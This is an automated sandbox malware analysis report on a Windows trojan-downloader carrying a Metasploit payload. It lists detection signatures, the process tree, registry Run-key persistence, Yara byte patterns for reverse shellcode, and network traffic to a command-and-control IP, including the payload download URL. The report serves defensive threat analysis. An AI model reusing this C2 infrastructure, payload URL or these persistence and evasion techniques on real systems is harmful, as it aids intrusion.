Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
Analysis ID:1521496
MD5:ccf3c480f27db238fa757d0967241817
SHA1:8067f4e9093dd68fc54a2270c3e4aa6e2e442929
SHA256:ab963f165c5269b14b0275a2b25f2e1110a7e3ca903324e106701a4167026270
Tags:exe
Infos:

Detection

Metasploit
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe" MD5: CCF3C480F27DB238FA757D0967241817)
    • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sh-runner.exe (PID: 3096 cmdline: "C:\ProgramData\sh-runner.exe" MD5: D178CD15E8E69662A943BF0A9DA7FF60)
      • conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sh-runner.exe (PID: 2196 cmdline: "C:\ProgramData\sh-runner.exe" MD5: D178CD15E8E69662A943BF0A9DA7FF60)
    • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sh-runner.exe (PID: 5472 cmdline: "C:\ProgramData\sh-runner.exe" MD5: D178CD15E8E69662A943BF0A9DA7FF60)
    • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"Type": "Metasploit Download", "URL": "http://84.201.150.223/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaCs5JSqzLx8SmijRwWz3ygEPuzWbwlW2dF8RGznIQHPzsqj8"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
    • 0x36b:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
    00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
    • 0x311:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
    00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
      • 0x36b:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
      Click to see the 4 entries

      System Summary

      barindex
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\sh-runner.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, ProcessId: 7128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyProgram
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-09-28T17:52:15.584063+020020287653Unknown Traffic192.168.2.44973184.201.150.2238443TCP
      2024-09-28T17:52:26.916639+020020287653Unknown Traffic192.168.2.44973484.201.150.2238443TCP
      2024-09-28T17:52:34.436379+020020287653Unknown Traffic192.168.2.44974284.201.150.2238443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Type": "Metasploit Download", "URL": "http://84.201.150.223/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaCs5JSqzLx8SmijRwWz3ygEPuzWbwlW2dF8RGznIQHPzsqj8"}
      Source: C:\ProgramData\sh-runner.exeReversingLabs: Detection: 39%
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exeReversingLabs: Detection: 39%
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeReversingLabs: Detection: 39%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeJoe Sandbox ML: detected
      Source: unknownHTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD10EA0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,2_2_00007FF72BD10EA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeCode function: 4x nop then sub rsp, 58h0_2_00007FF71C8C1D70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeCode function: 4x nop then push rbx0_2_00007FF71C8C2116
      Source: C:\ProgramData\sh-runner.exeCode function: 4x nop then sub rsp, 58h2_2_00007FF72BD6AF00

      Networking

      barindex
      Source: Malware configuration extractorURLs: http://84.201.150.223/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaCs5JSqzLx8SmijRwWz3ygEPuzWbwlW2dF8RGznIQHPzsqj8
      Source: global trafficTCP traffic: 192.168.2.4:49731 -> 84.201.150.223:8443
      Source: Joe Sandbox ViewASN Name: YANDEXCLOUDRU YANDEXCLOUDRU
      Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49731 -> 84.201.150.223:8443
      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49734 -> 84.201.150.223:8443
      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 84.201.150.223:8443
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.150.223
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeCode function: 0_2_00007FF71C8C1450 InternetOpenA,InternetOpenA,GetLastError,InternetOpenUrlA,InternetOpenUrlA,GetLastError,InternetCloseHandle,_fsopen,GetLastError,InternetCloseHandle,InternetCloseHandle,fwrite,InternetReadFile,InternetReadFile,fclose,InternetCloseHandle,InternetCloseHandle,0_2_00007FF71C8C1450
      Source: global trafficHTTP traffic detected: GET /sh-runner.exe HTTP/1.1User-Agent: DownloaderHost: 84.201.150.223Cache-Control: no-cache
      Source: unknownHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, ConDrv.0.drString found in binary or memory: http://84.201.150.223/sh-runner.exe
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeString found in binary or memory: http://84.201.150.223/sh-runner.exeSaving
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.201.150.223/sh-runner.exeT
      Source: sh-runner.exe, 00000002.00000003.1836656365.000001FF24C51000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000002.00000003.1836829093.000001FF24C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/&
      Source: sh-runner.exe, 00000002.00000003.1836104016.000001FF2307D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownloa
      Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF22FFA000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000002.3055154442.00000112CF5A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF5A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabk
      Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en2
      Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/
      Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/-
      Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223//9
      Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/4
      Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/7V
      Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/;~
      Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/=
      Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/?9
      Source: sh-runner.exe, 00000002.00000002.3055839319.000001FF24CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/E8
      Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF5D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/K
      Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/X
      Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/Y
      Source: sh-runner.exe, 00000002.00000003.2225218332.000001FF24CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/g(
      Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/p
      Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/q
      Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/s
      Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/u
      Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/x
      Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF5D5000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223/y
      Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223:443/
      Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223:443/P
      Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000003.2301836654.00000112CF60C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223:443/X
      Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE3BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223:443/g
      Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223:443/v
      Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://84.201.150.223:8443/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaC
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63070
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63071
      Source: unknownNetwork traffic detected: HTTP traffic on port 63069 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 63070 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 63071 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63065
      Source: unknownNetwork traffic detected: HTTP traffic on port 63067 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 63068 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 63065 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 63066 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63067
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63066
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63069
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63068
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownHTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49743 version: TLS 1.2

      System Summary

      barindex
      Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
      Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
      Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
      Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F70020 NtAllocateVirtualMemory,NtProtectVirtualMemory,2_3_000001FF24F70020
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD10020 RtlNtStatusToDosError,NtOpenFile,RtlNtStatusToDosError,2_2_00007FF72BD10020
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD11640 GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,NtOpenFile,SetFileInformationByHandle,CloseHandle,RtlNtStatusToDosError,NtOpenFile,RtlNtStatusToDosError,GetLastError,SetFileInformationByHandle,GetLastError,CloseHandle,SwitchToThread,CloseHandle,SwitchToThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,GetLastError,CloseHandle,memcpy,CloseHandle,CloseHandle,2_2_00007FF72BD11640
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA36F0 NtAddBootEntry,2_2_000001FF24FA36F0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA3EF0 NtAddBootEntry,2_2_000001FF24FA3EF0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA48A0 NtAddBootEntry,2_2_000001FF24FA48A0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA4050 NtAddBootEntry,2_2_000001FF24FA4050
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA3830 NtAddBootEntry,2_2_000001FF24FA3830
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA39E0 NtAddBootEntry,2_2_000001FF24FA39E0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA4310 NtAddBootEntry,2_2_000001FF24FA4310
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF690020 NtAllocateVirtualMemory,NtProtectVirtualMemory,4_3_00000112CF690020
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C39E0 NtAddBootEntry,4_2_00000112CF6C39E0
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C4050 NtAddBootEntry,4_2_00000112CF6C4050
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C3830 NtAddBootEntry,4_2_00000112CF6C3830
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C48A0 NtAddBootEntry,4_2_00000112CF6C48A0
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C4310 NtAddBootEntry,4_2_00000112CF6C4310
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C36F0 NtAddBootEntry,4_2_00000112CF6C36F0
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C3EF0 NtAddBootEntry,4_2_00000112CF6C3EF0
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE540020 NtAllocateVirtualMemory,NtProtectVirtualMemory,9_3_00000184BE540020
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE574310 NtAddBootEntry,9_2_00000184BE574310
